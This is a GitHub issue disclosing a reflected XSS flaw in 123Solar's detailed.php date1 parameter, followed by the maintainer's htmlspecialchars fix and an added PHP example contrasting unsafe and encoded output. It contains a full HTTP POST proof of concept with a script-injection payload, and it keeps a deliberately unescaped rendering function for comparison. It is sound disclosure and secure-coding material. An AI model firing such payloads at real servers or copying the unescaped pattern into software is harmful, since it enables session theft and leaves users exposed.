jeanmarc77 / 123solar

123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just needs a web server and PHP; no database is needed. The philosophy is: keep it simple, fast, with a low footprint to run on cheap and low-powered devices.
GNU General Public License v3.0

123Solar 1.8.4.5 has a reflected XSS vulnerability #73

Closed Hebing123 closed 4 days ago

Hebing123 commented 1 week ago

Summary

123Solar is a lightweight set of PHP/JS files that makes a web logger to monitor your photovoltaic inverter(s). It just needs a web server and PHP; no database is needed. The philosophy is: keep it simple, fast, with a low footprint to run on cheap and low-powered devices.

A reflected Cross Site Scripting (XSS) vulnerability exists in 123Solar 1.8.4.5 due to improper sanitization of the $date1 parameter in detailed.php.

Details

In the provided code, the date1 parameter is passed through a POST request and directly concatenated into JavaScript code on the server-side without proper encoding or escaping. This allows an attacker to inject arbitrary JavaScript code.

<?php
// Vulnerable pattern as reported: the POST value is read unescaped...
$date1 = $_POST['date1'];
// ...
// ...and interpolated straight into a single-quoted HTML attribute, so a
// quote in the input closes the attribute and the rest is rendered as markup.
echo "<input name='date1' id='datepickid' value='$date1' size=7 maxlength=10>";

The use of $_POST['date1'] directly in HTML without encoding makes it possible for an attacker to inject any JavaScript code, resulting in a reflected XSS vulnerability.

POC

POST /detailed.php HTTP/1.1
Host: 192.168.0.10:1107
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.6261.95 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Length: 286

date1=01/01/1967'><script>alert(document.cookie)</script>&checkavgpower=on&checkPROD=on&checkPERF=on&checkIP1=on&checkIV1=on&checkIA1=on&checkPERF1=on&checkIP2=on&checkIV2=on&checkIA2=on&checkPERF2=on&checkG1P=on&checkG1V=on&checkG1A=on&checkFRQ=on&checkINVT=on&checkBOOT=on&checkEFF=on


jeanmarc77 commented 4 days ago

fixed with htmlspecialchars
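The following is an added example (not code from 123Solar or from either commenter) showing the reported pattern next to the htmlspecialchars()-based fix the maintainer mentions, plus an optional input-validation layer. Function names, the regex, and the sample payload are assumptions for illustration. The one detail worth checking when applying such a fix is the flag argument: the attribute in detailed.php is delimited by single quotes, and before PHP 8.1 htmlspecialchars() defaulted to ENT_COMPAT, which leaves a single quote unencoded.

```php
<?php
// Added example, not 123Solar's code: rendering a user-supplied date into a
// single-quoted HTML attribute without letting the value break out of it.
// Function names and the accepted date format are assumptions.

// Optional first layer: accept only the shape the form expects (dd/mm/yyyy,
// matching the PoC's "01/01/1967"); anything else is dropped before rendering.
function validateDateInput(?string $raw): ?string
{
    if ($raw === null) {
        return null;
    }
    return preg_match('#^\d{2}/\d{2}/\d{4}$#', $raw) === 1 ? $raw : null;
}

// Output-encoding layer: escape for an HTML attribute context.
// ENT_QUOTES matters here because the attribute uses single quotes; on PHP < 8.1
// the default flags (ENT_COMPAT) would leave ' untouched and the fix would be incomplete.
function dateInputHtml(?string $date1): string
{
    $safe = htmlspecialchars($date1 ?? '', ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return "<input name='date1' id='datepickid' value='{$safe}' size=7 maxlength=10>";
}

// The pattern from the report, kept only for side-by-side comparison.
function dateInputHtmlUnsafe(?string $date1): string
{
    return "<input name='date1' id='datepickid' value='{$date1}' size=7 maxlength=10>";
}

// Constructed sample input in the shape of the report's PoC payload.
$payload = "01/01/1967'><script>alert(1)</script>";

echo "unsafe   : " . dateInputHtmlUnsafe($payload) . PHP_EOL;
// the attribute closes after 1967 and a <script> element is emitted into the page

echo "encoded  : " . dateInputHtml($payload) . PHP_EOL;
// value='01/01/1967&#039;&gt;&lt;script&gt;alert(1)&lt;/script&gt;' stays inside the attribute

echo "validated: " . var_export(validateDateInput($payload), true) . PHP_EOL;
// NULL: the payload does not match the expected date shape and is rejected outright
```

Encoding at the point of output is the fix that actually closes the hole; the validation layer is defence in depth and also gives the application a clean place to reject malformed dates before they reach any date-parsing logic.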